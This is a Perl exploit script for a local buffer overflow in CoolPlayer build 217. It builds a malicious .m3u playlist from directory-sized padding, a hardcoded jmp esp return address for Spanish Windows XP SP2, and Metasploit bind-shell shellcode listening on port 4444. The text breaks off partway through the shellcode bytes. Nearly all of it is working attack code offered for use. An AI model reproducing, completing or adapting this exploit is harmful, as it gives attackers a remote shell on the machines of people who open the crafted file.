1 #######################################################################
2 #
3 # CoolPlayer, Latest Build: 217
4 # Web:: http://coolplayer.sourceforge.net/
5 # Playlist(.m3u) File Local Buffer Overflow Exploit
6 #
7 # Vuln: http://www.securityfocus.com/bid/21396
8 #
9 #
10 # Greetz: Luigi Auriemma que ha descubierto una nueva vulnerabilidad en este software junto
11 # a esta vuln que era antigua y que ha sido redescubierta en un software con adware por mi
12 # TotalPlayer 3.0(fake de Coolplayer), thanks luigi xDD
13 # Además del equipo de www.p1mp4m.es −−>musashi,patoruzu,elvispresley,pepepistola,skyline2412
14 #
15 # Y en especial a este ultimo:skyline2412(puso parte del codigo y me ayudo bastante con la tarea) y
16 # el_manguan que estuvo ayudando tambien y probando.
17 #
18 # Exploit by: Trancek
19 # Email:trancek@yashira.org
20 #
21 # Note: The .m3u file must be load in the player from the dir that was generated.
22 # and If the dir is the root directory as C:/ or F:/ , you must add AAA to junk
23 #
24 #######################################################################
25 use Cwd;
26
27 print "CoolPlayer 2.17 .m3u Exploit\n\n";
28
29
30 $dir = getcwd()."/";
31 $lon = length($dir);
32 $a = 260 − $lon;
33 $junk = ’A’ x $a;
34 $ret = "\xED\x1E\x95\x7C"; #jmp esp en ntdll.dll,win xp sp2(spanish)
35
36
37 # win32_bind − EXITFUNC=thread LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
38 my $shellcode =
39 "\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x22".
40 "\x5f\x3c\xf7\x83\xeb\xfc\xe2\xf4\xde\x35\xd7\xba\xca\xa6\xc3\x08".
41 "\xdd\x3f\xb7\x9b\x06\x7b\xb7\xb2\x1e\xd4\x40\xf2\x5a\x5e\xd3\x7c".
42 "\x6d\x47\xb7\xa8\x02\x5e\xd7\xbe\xa9\x6b\xb7\xf6\xcc\x6e\xfc\x6e".
43 "\x8e\xdb\xfc\x83\x25\x9e\xf6\xfa\x23\x9d\xd7\x03\x19\x0b\x18\xdf".
44 "\x57\xba\xb7\xa8\x06\x5e\xd7\x91\xa9\x53\x77\x7c\x7d\x43\x3d\x1c".
45 "\x21\x73\xb7\x7e\x4e\x7b\x20\x96\xe1\x6e\xe7\x93\xa9\x1c\x0c\x7c".
46 "\x62\x53\xb7\x87\x3e\xf2\xb7\xb7\x2a\x01\x54\x79\x6c\x51\xd0\xa7".
47 "\xdd\x89\x5a\xa4\x44